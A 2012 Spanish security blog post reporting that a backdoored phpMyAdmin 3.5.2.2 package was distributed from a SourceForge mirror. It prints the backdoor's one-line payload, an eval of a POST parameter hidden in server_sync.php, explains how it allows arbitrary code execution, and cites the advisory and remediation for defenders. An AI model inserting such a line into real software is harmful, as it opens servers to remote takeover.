miércoles, 26 de septiembre de 2012

PhpMyAdmin distribuido temporalmente con una puerta trasera

PhpMyAdmin ha reconocido que temporalmente se ha distribuido desde repositorios oficiales de Sourceforge una versión de su programa que ha sido modificada y a la que se le ha añadido una puerta trasera.

El software malicioso se ha encontrado en el paquete "phpMyAdmin-3.5.2.2-all-languages.zip" localizado en el servidor espejo "cdnetworks-kr-1" de SourceForge.net. En este paquete se encontraba el fichero legítimo 'js/cross_framing_protection.js' modificado,  y además archivo ajeno a la distribución que contenía toda la lógica de la puerta trasera: server_sync.php.

El funcionamiento de la puerta trasera permitía a los atacantes obtener el control del servidor donde se hubiese instalado esta versión modificada. El fichero 'server_sync.php' contenía en su interior el siguiente código:

?@eval($_POST['c'])?

que se encargaba de evaluar las peticiones POST que contenían el parámetro "c" y ejecutar el código php que tuviese esa petición. En la práctica, significa que con solo realizar una petición al servidor con el phpMyAdmin vulnerado, se podría ejecutar cualquier código PHP y, a partir de ahí si no se encuentra convenientemente bastionado, ejecutar comandos en el servidor a través de directivas PHP como "system", "exec"...

Fuente: http://arstechnica.com/security/2012/09/questions-abound-as-malicious-phpmyadmin-backdoor-found-on-sourceforge-site/

Desde SourceForge se está investigando aún el caso. Estos servidores alojan más de 300.000 proyectos y no descartan que pueda encontrarse algún proyecto más comprometido, o que la puerta trasera pueda haberse replicado en otro mirror.

Ya se ha agregado un módulo a Metasploit para comprobar desde el programa que existe esta puerta trasera en una instalación.

En enero de 2011 ya atacaron Sourceforge. Se detectaron una serie de ataques dirigidos específicamente contra ellos que concluyeron con el compromiso de varios servidores. Sourceforge se ha vio obligada a apagar "un puñado" de servidores para intentar contrarrestar el ataque.

PhpMyAdmin ha recomendado la descarga y reinstalación completa del software si contiene el fichero 'server_sync.php'

Más información:

Servidores de Sourceforge comprometidos por atacantes

PhpMyAdmin Security Advisory (PMASA-2012-5)

Questions abound as malicious phpMyAdmin backdoor found on SourceForge site


Jose Ignacio Palacios




1 comentario:

  1. Calm down. From http://sourceforge.net/blog/phpmyadmin-back-door/

    "Through logs, we have identified that approximately 400 users downloaded this corrupted file."

    ResponderEliminar